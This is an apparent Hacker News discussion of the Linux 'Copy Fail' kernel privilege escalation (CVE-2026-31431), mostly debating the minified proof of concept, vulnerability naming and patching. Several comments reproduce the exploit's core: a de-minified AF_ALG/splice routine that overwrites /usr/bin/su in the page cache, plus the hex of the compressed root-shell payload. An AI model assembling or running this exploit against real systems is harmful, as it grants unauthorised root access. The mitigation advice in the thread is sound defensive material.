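A `(False, 'EAFNOSUPPORT')` result means the modules can't be loaded at all; `(False, 'EACCES')` or `(False, 'EPERM')` means a security policy stopped it.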

The fetishism of "byte count" (here, as a "732 byte python script") needs to stop, especially in a context like this where they're trying to illustrate a real failure mode.

Looking at their source code [1] it starts with this simple line:

    import os as g,zlib,socket as s

And already I'm perplexed. "os as g"? but we're not aliasing "zlib as z"? Clearly this is auto-generated by some kind of minimizer? Likely because zlib is called only once, and os multiple times. As a code author/reviewer, I would never write "os as g" and I would absolutely never approve review of any code that used this.

Anyway, I could go on. :) Let's just stop fetishizing byte count.

[1] https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...

  • Hilariously, "os as g" adds one more byte than it saves, since os is only used 4 times but the alias takes 5 extra bytes to save 4. And "socket as s" comes out even.

    If you wanted real savings, you'd use "d=bytes.fromhex" instead of defining a function -- 17 bytes!! And d('00') -> b'\0' for -2 bytes.

    We could easily get the byte count down further by using base64.b85decode instead of bytes.fromhex (-70 or so), but ultimately we're optimizing a meaningless metric, as you mention.
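For concreteness, the alias arithmetic above works out like this (byte counts taken from the comment; the figure of 4 uses of `os` is as claimed there):

```python
# Cost/benefit of "import os as g" in the minified PoC.
alias_cost = len(" as g")                 # 5 extra bytes in the import line
uses = 4                                  # times "os." appears in the script
savings = uses * (len("os") - len("g"))   # 1 byte saved per use -> 4 total
print(alias_cost - savings)               # net bytes ADDED by the alias -> 1
```

So the alias is a net loss of one byte, as the comment says; `socket as s` saves 5 bytes per use against a 5-byte alias cost, so it only breaks even.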

  • I don't see it as fetishizing byte count. I think of it as a proxy measure for how complicated or uncomplicated the exploit might be. They could just as well have said "we can do it in 3 lines of python" or "the Shannon entropy of the script implementing the exploit is really small" and I would have interpreted it similarly.

    Where do you see this "fetishizing" happening most often? It's a strange thing to counter-fetishize about.

    • > I think of it as a proxy measure for how complicated or uncomplicated the exploit might be.

      From a Busy Beaver, 256-bytes compo, or Dwitter perspective, 732 bytes isn’t really that meaningful.

      And the sample exploit is even optimizing the byte size by using zlib compression, which doesn’t make much sense for the purpose. It just emphasizes the byte count fetishization.

      3 replies →

  • I don't get the 732-byte thing either, and while I think it's a relatively punchy and unusually informative landing page for a named vulnerability, there are little snags like this all over it.

    But the fact that it's not a kernel-exec LPE and it's reliable across kernels and distributions is important; it's close to the maximum "exploitability" you're going to see with an LPE. Which the page does communicate effectively; it just gilds the lily.

    • yeah... definitely a bit of a rush to get the landing page out after a long time in the disclosure process. The folks putting this all together have been working like mad (finding the bug, disclosing, working a lot on patching, writing up POCs and verifying exploitability in different scenarios) and stayed up really late to finish up the landing page, which led to a lot of minor issues.

      But the bug is real and people should patch :)

      For the size: sometimes people will shove in kilobytes of offset tables or something into an exploit, so it'll fingerprint and then look up details to work. This is much smaller because it doesn't need any of that, which is important for severity. (I agree the "golf" nature is a bit of an aside, kind of like pwn2own exploits taking "10 seconds")

  • Glad I’m not alone. The whiplash from “oh, python I can read this” to “what the hell does that do” was jarring.

    Assuming AI was correct, it unpacks more or less like this:

        import os, zlib, socket

        AF_ALG = 38
        SOCK_SEQPACKET = 5
        SOL_ALG = 279

        def hex_bytes(x):
            return bytes.fromhex(x)

        def trigger(fd, offset, patch4):
            sock = socket.socket(AF_ALG, SOCK_SEQPACKET, 0)
            sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
            sock.setsockopt(SOL_ALG, 1, hex_bytes("0800010000000010" + "0" * 64))
            sock.setsockopt(SOL_ALG, 5, None, 4)
            op, _ = sock.accept()
            length = offset + 4
            zero = b"\x00"
            op.sendmsg(
                [b"A" * 4 + patch4],
                [
                    (SOL_ALG, 3, zero * 4),
                    (SOL_ALG, 2, b"\x10" + zero * 19),
                    (SOL_ALG, 4, b"\x08" + zero * 3),
                ],
                32768,
            )
            read_pipe, write_pipe = os.pipe()
            os.splice(fd, write_pipe, length, offset_src=0)
            os.splice(read_pipe, op.fileno(), length)
            try:
                op.recv(8 + offset)
            except:
                pass

        target = os.open("/usr/bin/su", os.O_RDONLY)
        payload = zlib.decompress(bytes.fromhex("..."))
        offset = 0
        while offset < len(payload):
            trigger(target, offset, payload[offset:offset + 4])
            offset += 4

        os.system("su")

  • I started to take the exploit script apart and reformat it to be something readable. At about 1041 bytes it's actually readable. The heart of it also includes an encoded zlib-compressed blob that's 90 bytes (180 hex characters) long ('78daab77...'). This is decompressed (zlib.decompress(d(BLOB))) to a 160-byte ELF.

  • > I would absolutely never approve review of any code that used this.

    How often do you review, and subsequently block the release, of PoCs in this sort of context? Sounds like you've faced this a lot.

    I always thought code quality mattered less in those, as long as you communicate the intent.

    • If you have a choice between posting minimized exploit code, and posting regular exploit code, posting minimized code is virtually always the wrong choice.

      If you have a choice between pointing out the byte size of the exploit, and not pointing out the byte size of the exploit, pointing it out is virtually always the wrong choice.

      In both cases, doing the right thing is less work. So somebody is going out of their way to ensure they are doing it wrong. If they didn't care, they'd end up doing it right by default.

    • > as long as you communicate the intent

      How does "import os as g" communicate the intent? How does hiding the payload behind zlib communicate the intent? This is the opposite: obfuscating the intent, so they can brag about 732 bytes instead of 846 bytes (or whatever it might have been).

      It would have been less work for everyone involved to just release the unminified source.

    • While not formally reviewing code like this, I read a lot of it for fun. When it's clear and understandable, it's more educational and enjoyable. If the PoC code can also serve as a means of communication, that seems like an extra win.

  • While I agree that it doesn't make much sense to use a minimizer on code the reader could understand, the code-golfed byte count of a CVE repro communicates its complexity in a certain visceral way.

  • It's just lazy AI* writing w/o editing.

    "Just" is doing a lot of work there, I'm so annoyed reading it.

    It's like an anti-ad and they had pretty cool material to work with.

    * Claude loves staccato "Some numeric figure. Something else. Intensifier" (e.g. the "exploitable for a decade." or whatever sentences)

  • > Anyway, I could go on.

    Then go on. zlib is only used once, so "zlib as z" in exchange for using z once doesn't get you anything. Using os directly and not renaming it g saves you 2 bytes though. But in this age where AI outputs reams of code at the drop of a hat, why shouldn't we enjoy how small you can get it to pop a root shell?

    https://gist.github.com/fragmede/4fb38fb822359b8f5914127c2fe...

    edit: If we drop offset_src=0 and just pass in 0 positionally, it comes down to 720.

    • >...why shouldn't we enjoy how small you can get it to pop a root shell?

      Because I want to know what the exploit is doing and how it works, and if it's even safe to run.

      A privesc PoC is NOT the place for this kind of fun.

      1 reply →

  • >As a code author/reviewer, I would never write "os as g" and I would absolutely never approve review of any code that used this.

    lucky for them, it's an exploit script, not enterprise code.

    all that needs to be "reviewed" is whether or not it exploits the thing it's supposed to.

    edit: y'all really think a 10-line proof-of-concept script needs to undergo a code review? wild. i shouldn't be surprised that the top comment on a cool LPE exploit is complaining about variable naming

    • It's just sloppy. Readers are human, and little mistakes like this take away from the article. Then you add a nonexistent RHEL version, and it just isn't a good look. Which is a shame, because it's otherwise a very interesting vuln.

      Maybe you didn't care, but the length of this comment chain clearly shows that it matters. Effective communication is just as important as the engineering.

      7 replies →

What is the rationale behind naming CVEs and individual domains? Marketing?

  • The AI generated prose screams marketing. Marketing is why there's a "Contact our Security Team" form at the bottom of the page.

  • It's certainly marketing, but it's prosocial: there's no scarcity of names, and "copy.fail" is much easier to remember and talk about than "CVE-2026-31431".

  • can you remember what CVE-2021-44228 is without looking it up? CVE-2014-6271? CVE-2017-5753?

    i bet if i told you their names, you would instantly know what vulns those are.

    it's easier to talk about things with names. it hurts no one. it takes approximately no effort or time.

    CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.

    • > CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.

      What, you guys talk about books based on their “title” instead of just memorising the ISBN of each book? Pssh, count me disappointed!

      2 replies →

  • Probably to some extent it is marketing, but generally it's about getting the word on significant bug finds out to the people who need to apply patches and/or be informed. Heartbleed, Log4Shell, etc.

    Very few CVEs get names dedicated to them like this, because usually when they do, it is very serious, as in this case.

  • Giving catchy names to bad exploits has been a thing for a while, probably to make them easy to reference and to make sure you're patched, as opposed to passing numbers around. Heartbleed, Shellshock, BEAST, Goto Fail, etc.

  • Yes, originally it was to help spread awareness. Now it has become more of a gimmick I would say

I wonder if this is a problem for very old honeypots like the one on the Turris Omnia, sold many years ago. Docker wasn't a thing in those days and everything was done with LXC containers, if at all.

Quickly dove into this.

1. Yes, it's real.

2. Current chain can write any arbitrary content to any user-readable file (into the page cache).

3. Current chain relies on an available target suid binary that you can open() as a lowpriv user.

4. Current exploit relies on that binary being /bin/su and then being able to execve(/bin/sh, 0, 0) (which doesn't work on alpine, etc.). The former is easily replaced in the code. The latter needs a rebuilt payload ELF (also easy).

5. The authors say they have other chains (including ones that allow container escapes). I believe them.

6. A mildly de-minified PoC for Alpine with a new payload ELF is at hackerspace[pl]/~q3k/alpine.py . You'll need /bin/ping from iputils. This should now be somewhat reliable on any distro that has a `/bin/sh` and any setuid-and-readable binary (you'll just need to find it on your own).

> Any setuid-root binary readable by the user works.

Interesting detail. On Alpine, `/usr/bin/su` is not readable by any user, so the PoC doesn't work.

I suspect that the underlying issue can be exploited in other ways, but it makes me think that there's no reason for any suid binary to be world-readable.
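Auditing your own box for the precondition the PoC needs is easy. A sketch (the list of search roots is an assumption; adjust for your distro):

```python
import os
import stat


def world_readable_setuid(roots=("/usr/bin", "/usr/sbin", "/bin", "/sbin")):
    """List setuid binaries that any user can open() for reading --
    the precondition the published PoC needs."""
    hits = set()
    for root in roots:
        if not os.path.isdir(root):
            continue
        for entry in os.scandir(root):
            try:
                st = entry.stat(follow_symlinks=False)
            except OSError:
                continue
            mode = st.st_mode
            if stat.S_ISREG(mode) and (mode & stat.S_ISUID) and (mode & stat.S_IROTH):
                hits.add(entry.path)
    return sorted(hits)


if __name__ == "__main__":
    for path in world_readable_setuid():
        print(path)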

For agents, if you are concerned about that, block access to "su" as it is interactive anyway. Not loading it into the memory will block the attack. If you are using AgentSH (https://www.agentsh.org) you can add a rule to block "su" and soon be able to block AF_ALG sockets if you want to further protect things.

  • This vulnerability can affect any file you can read. The PoC uses "su" but any setuid binary or any binary that root invokes or is already running as root is vulnerable, as well as many configuration files.

On the downside, I need to push new kernels to all my servers.

On the bright side, does this mean Magisk is coming to all unpatched Android phones?

  • No, Android doesn’t have suid binaries to exploit like in the PoC

    • The vulnerability can also be used on any binary that is already running as root and that you can open for reading. So yes, any Android app can now escalate to root if Android ships the vulnerable module.

      1 reply →

Looks like an LLM hallucination - there is no such thing as "RHEL 14.3", although the referenced kernel version (6.12.0-124.45.1.el10_1) does reference a real RHEL release, i.e. 10.1.

So this could be usable in a lot of places with Python and Linux running? Not that I have too many Linux devices around. Still, it might be handy sometimes on personal devices.

It looks like this is legit, but the script is very fishy and I wouldn't run it anywhere but a virtualized or disposable system.

https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...

>zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))

This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)

That said, I understand why a terser script might have been prioritized.

EDIT: There's a couple of C ports in the comments that contain more details and no compressed payloads.

  • > This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)

    It doesn't, it's just a compressed ELF file that does setuid(0); execve(/bin/sh, 0, 0). You can just unzlib it and throw it in a disassembler.
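You don't even need a disassembler to sanity-check the claim. Assuming the hex string survived the copy-paste intact (it's reproduced verbatim from the PoC), decompressing it should yield a tiny ELF image, which the comments above describe as roughly 160 bytes:

```python
import zlib

# Compressed payload exactly as it appears in the published PoC.
BLOB_HEX = (
    "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c30"
    "1d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b"
    "9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
)

payload = zlib.decompress(bytes.fromhex(BLOB_HEX))
# Per the thread, this is a small ELF: the first 4 bytes should be
# the ELF magic b'\x7fELF'.
print(len(payload), payload[:4])
```

If the first four bytes aren't `\x7fELF`, or the output is large, that would be a red flag worth investigating before running anything.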

Wow. I tried it on an old testing VM of Ubuntu 24.04 that had not been touched for a few months. Instant root with the bonus that any user that runs "su" gets root too. I updated the VM thinking it would be fixed afterward. Nope.

s6-overlay is a popular container image base for many self hosted services, and it uses an suid binary for startup. I wonder if this could be used to escape the container?

Can we just make a one-pager instead of this nonsense LLM bullet pointed list that is explaining this issue to your pointy-haired CEO instead of to sysadmins who understand the badness in 3 lines? Yeesh

I tried this exploit on Android and it looks like you need root in the first place to create an AF_ALG socket. I guess it is an SELinux policy to disable AF_ALG entirely.

I love how it says "Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib). Targets /usr/bin/su by default; pass another setuid binary as argv[1]."

Except you can't pass another setuid binary as argv[1] because the AI writing this slop never added that feature to this python script.

I can't get it to work on any distro i've tried.

> Will you release the full PoC?

> Yes — it's on this page. We held it for a month while distros prepared patches; the major builds are out as of this writing.

There is no update available for Ubuntu 24.04; the PoC still works, and I just tried updating.

I tried this on NixOS, but it doesn't seem to be easily reproducible. There's no /usr/bin/su - okay, fine: I changed it to /run/wrappers/bin/su, but that didn't work, and I think the reason why is because the NixOS suid wrappers have +x but not +r:

    $ ls -lah /run/wrappers/bin/su
    -r-s--x--x 1 root root 70K Apr 27 11:09 /run/wrappers/bin/su

Not that this makes the underlying mechanism of the exploit any better, but I wonder what else you can do with it. Is there a way to target a suid binary that doesn't have +r? I guess all of the suid binaries necessarily don't, since the wrapper system doesn't grant it and you can't have suid binaries in the /nix/store.

I know it's also unrelated, but this is the most aggressively obvious LLM slop copy I've ever seen and it is a page with like 30 sentences. I guess we're just seriously doing this, huh?

  • It's the same with Gentoo, setuid binaries are installed without read permission.

    But modifying a setuid binary is just the demo exploit that was published with the vulnerability disclosure. The vulnerability actually allows modifying four bytes in any readable file. That means system configuration files, other binaries intended to be run by root, libraries... It's not limited to modifying setuid binaries.

You can tell security has become complete theatre when people are registering domains and setting up a whole fucking website for individual ones.

Use extreme caution running arbitrary code on your machines, especially obfuscated code that tickles kernel bugs!

  • The page explicitly describes that it is stealthy as it does not make permanent changes, only corrupting the binary in memory.

    • unfortunately the page can also lie to you haha. it seems people have reviewed the code by now, but running suspicious shellcode you don't fully understand is never a great idea.

      2 replies →

SUID binaries once again assisted a local privilege escalation attack. This is a major problem that distros can't keep ignoring.

  • There's a claim upthread that a straightforward variation works against /etc/passwd.

    • You can also just use this to patch libc and turn close() into close-but-also-give-me-a-root-shell().

> If your kernel was built between 2017 and the patch

This is why I compile my own kernel. I disable things I don't use. If it's not present it can't hurt you.

> block AF_ALG socket creation via seccomp regardless of patch state.

Likewise, I use seccomp to allow only the syscalls that are necessary. Everything else is disabled. In the programs I have that need to connect to a backend socket, the connection is made first, and then socket creation is disabled.

  • Any pointers on how to set that up? Like, run everything through strace, cut the first field, sort, uniq, run it through some template... something like that? How?
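Not strace-based, but if the workload runs under systemd, the built-in sandboxing directives get most of the same effect with far less effort than a hand-rolled seccomp filter. A sketch (the unit and file names are placeholders; tailor the address-family list to what the service actually needs):

```
# /etc/systemd/system/myservice.service.d/harden.conf  (hypothetical unit)
[Service]
# Allow only the address families the service actually needs;
# AF_ALG (and anything else unlisted) is then denied at socket() time.
RestrictAddressFamilies=AF_UNIX AF_INET AF_INET6
# Optional syscall allow-list; @system-service is systemd's baseline group.
SystemCallFilter=@system-service
SystemCallErrorNumber=EPERM
```

`systemd-analyze syscall-filter` lists what each `@group` expands to, which helps when tightening the filter beyond the baseline.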

Does anyone have a workaround for it? Edit: I don't understand why the comment would be downvoted.

  • I used, for debian based systems:

      printf "# CVE-2026-31431\nblacklist algif_aead\ninstall algif_aead /bin/false\n" | sudo tee /etc/modprobe.d/blacklist-algif_aead.conf >/dev/null && sudo update-initramfs -u

It does not behave as described on EndeavourOS (Arch-based) running kernel 6.19.14-arch1-1. I receive the error:

    Password: su: Authentication token manipulation error

I'm guessing this means it's already patched?

I'm impressed that such a serious problem popped up out of nowhere.

In my opinion, this mostly affects countries that are still using outdated systems, especially critical systems.

This gives bad actors a direct route to root. Easily accessible root is not funny.

Yet some people will still continue to say that "AI" isn't ready to replace (or strongly assist) our workflows. Sure - but some of the best human devs left a vulnerability this serious (and it's extremely serious; so many container-as-a-service platforms are vulnerable) in the kernel for 9 years, and an agent found it in 1 hour. Maybe it's time to wake up and accept that it's UNSAFE to not use AI for security review as well?

  • A human security researcher found the core issue and an agent searched for where to apply it. I don’t think “an agent found it in one hour” is a fair summary of what happened.

    • "The starting insight — that splice() hands page-cache pages into the crypto subsystem and that scatterlist page provenance might be an under-explored bug class — came from human research by Taeyang Lee at Xint. From there, Xint Code scaled the audit across the entire crypto/ subsystem in roughly an hour. Copy Fail was the highest-severity finding in the run."

      So, if anything, this might argue against the presence of huge quantities of high-severity bugs in this part of the Linux kernel (that could be found by "Xint Code"-class scanning systems).

    • I was a bit rough, agreed, but the overall point is still correct. I'll add that I've also recently run hundreds of loops (a combination of opus-4.6/gpt-5.4/gemini-3.1-pro-preview) against a Rust codebase that we manage and had deemed secure after many audits - including a paid external audit by a third party - and found 2 serious issues in it as well. That genuinely makes me scared of releasing anything without deep AI verification nowadays.

      Anybody else have the same feeling?